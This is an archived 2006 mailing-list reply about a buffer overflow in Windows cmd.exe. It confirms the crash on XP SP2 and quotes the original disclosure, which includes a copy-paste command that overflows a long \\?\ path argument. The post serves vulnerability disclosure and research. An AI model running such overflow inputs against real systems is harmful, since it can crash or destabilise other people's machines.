Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos



Vulnerability Development: Re: Windows Command Processor CMD.EXE Buffer Overflow

Re: Windows Command Processor CMD.EXE Buffer Overflow

From: Bernardo Wernesback <bernardosw_at_gmail.com>
Date: Mon, 23 Oct 2006 13:35:48 -0300

Reproduced the problem on Windows XP SP2 + All Patches English Version.

EventType : BEX P1 : cmd.exe P2 : 5.1.2600.2180 P3 : 41107ebe
P4 : unknown P5 : 0.0.0.0 P6 : 00000000 P7 : 00410041
P8 : c0000005 P9 : 00000008

DEP went into action and generated a dump to be sent to Microsoft for cmd.exe.

On 10/19/06, gregory_panakkal <gregory_panakkal_at_fastmail.fm> wrote:
>
> Windows Command Processor CMD.EXE Buffer Overflow
> Tested on WinXP SP2
> Impact - Very Low
>
>
> Copy-paste the following line in cmd.exe and execute it..
> (it is a single command, has been split into multiple lines for
> readability sake).
>
> %COMSPEC% /K "dir
> \\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
>
> (260 characters of 'A's)
>
> DEP Comes into the picture.
>
> URL :
> http://www.infogreg.com/security/misc/windows-command-processor-cmd.exe-buffer-overflow.html
>
> regards,
> Gregory Panakkal
> www.infogreg.com
> --
> gregory_panakkal
> gregory_panakkal_at_fastmail.fm
>
> --
> http://www.fastmail.fm - I mean, what is it about a decent email service?
>
>
Received on Oct 23 2006

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
edgeos